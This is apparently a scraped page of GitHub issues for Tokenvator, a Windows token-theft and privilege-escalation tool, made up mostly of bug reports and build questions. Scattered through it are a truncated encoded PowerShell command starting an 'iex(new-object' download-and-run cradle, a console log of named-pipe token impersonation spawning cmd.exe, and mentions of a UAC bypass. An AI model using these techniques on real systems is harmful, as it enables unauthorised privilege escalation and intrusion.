0xbadjuju / tokenvator Goto Github PK

The title should be enough.

Hi, I noticed that NT AUTHORITY\LOCAL SERVICE was unable to write to the named pipe created by another user, due to too strict permissions on the pipe.

Using https://github.com/decoder-it/pipeserverimpersonate everything works fine.

I think that the issue can be solved like this: https://github.com/decoder-it/pipeserverimpersonate/blob/master/pipeserverimpersonate.ps1#L173

TokenVator.exe powershell.exe - Opens PowerShell
TokenVator.exe powershell.exe -enc aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAb... - Not Functional

hello. First of all thank you for this beautiful project.

i am using visual studio 2012 ultimate . But i can't build this project.

what is problem ?

The master branch currently targets Framework 4.5, which is not "Import the project into Visual Studio. The current target framework is .Net 3.5. "

Can you change that?

Can it steal token from TI?

While backspacing a command you can go back beyond the normal prompt resulting in:

System.ArgumentOutOfRangeException: The value must be greater than or equal to zero and less than the console's buffer size in that dimentsion. Parameter name: left Actual value was -1. at System.ConsoleSetCursorPosition(Int32 left, Int32 top) at Tokenvator.TabComplete.KeyInput(StringBuilder stringBuilder, ConsoleKeyInfo at keyDown) at Tokenvator.TabComplete.ReadLine() at Tokenvator.MainLoop.Run()

Pressing return will return you to normal state.

I successfully stole a process token, but I wasn't able to enable the privileges SeSecurityPrivilege and SeTakeOwnershipPrivilege, because there wasn't any:

I tried using Enable_Privilege ProcID SeSecurityPrivilege, but what I got is just this:

That means it should've worked out, but it didn't... The command List_Privileges ProcID always returns the same stuff like on the first screenshot.

I also tried running CMD as an admin and even as an NT AUTHORITY\System, but nothing worked out.

Seems like the program removes almost all privileges after launching. Is there a way to restore them using Tokenvator?

Hello, it seems that for some reason the newest update to Windows 10 broke the BypassUAC function, no matter what file I give it (even giving it a full path) it throws a file not found error.

Hello,

I came to this Repo from your article after trying to find a workable solution to my problem.
I have 2 questions you could help me with at your discretion.

First of all, I am trying to create a program that would run under a local Windows User.
The program would periodically check some settings, and would allow for the management of some configurations. This includes restarting windows in case of some extreme error.

Unfortunately both operations need administrator rights. I am thus trying to run my program under and administrator account. Upon restarting the program would need to run once again.

Right now I use impersonation to switch the current user to and user of the administrator group. This works, however I also need Elevated status, which is not given by me. (some googling informed me that elevated status is determined on process startup?)

Do you have any idea on how to tackle this issue? I was thinking of using a kind of bootstrapper that would impersonate the admin account and would then create a process using 'runas'. I am in the process of testing that solution.

Secondly you seem to know a lot about windows authenticating, do you perhaps know a source of information were i could get a more general overview of this process (UAC, administrators, tokens etc.). The docs tend to go pretty deep and its hard to keep an overview. Or perhaps its a nice blog suggestion :)

BypassUAC fails on windows 10 1703

commenting out
//Console.WriteLine(" [+] Initialized SID: {0}", pSID.ToInt32());
in SetTokenInformation seams to solve the issue, strange

EDIT: change it to ToInt64 and it works
there is also a crash in Tockens:dispose but probably unrelated

hi, i cannot build this because this file is missing?

well met this problem when establishing the project, and i ve found an issue dealing with it but it had been closed, so somebody do me a favor please?

Hi,

I was testing Tokenvator when I got this stacktrace when printing to the named pipe from another process.

PS C:\users\public\phra> .\Tokenvator4.5.exe
(Tokens) > Steal_Pipe_Token \\.\pipe\phra cmd.exe
[*] Running cmd.exe
[*] Creating Listener Thread
[+] Created Pipe \\.\pipe\phra
[*] Joining Thread
[+] Connected to Pipe \\.\pipe\phra
[+] Read Pipe \\.\pipe\phra
[+] Impersonated Pipe \\.\pipe\phra
[+] Thread Token 0x02E4
[*] Joined Thread
[*] CreateProcessWithLogonW
 [+] Created process: 6352
System.FormatException: Index (zero based) must be greater than or equal to zero and less than the size of the argument list.
   at System.Text.StringBuilder.AppendFormatHelper(IFormatProvider provider, String format, ParamsArray args)
   at System.String.FormatHelper(IFormatProvider provider, String format, ParamsArray args)
   at System.IO.TextWriter.WriteLine(String format, Object arg0)
   at System.IO.TextWriter.SyncTextWriter.WriteLine(String format, Object arg0)
   at System.Console.WriteLine(String format, Object arg0)
   at Tokenvator.NamedPipes.GetPipeToken(String pipeName, String command)
   at Tokenvator.MainLoop.StealPipeToken(String input)
   at Tokenvator.MainLoop.Run()
 [-] Function MainLoop failed:
 [-] The system cannot find the file specified
(Tokens) >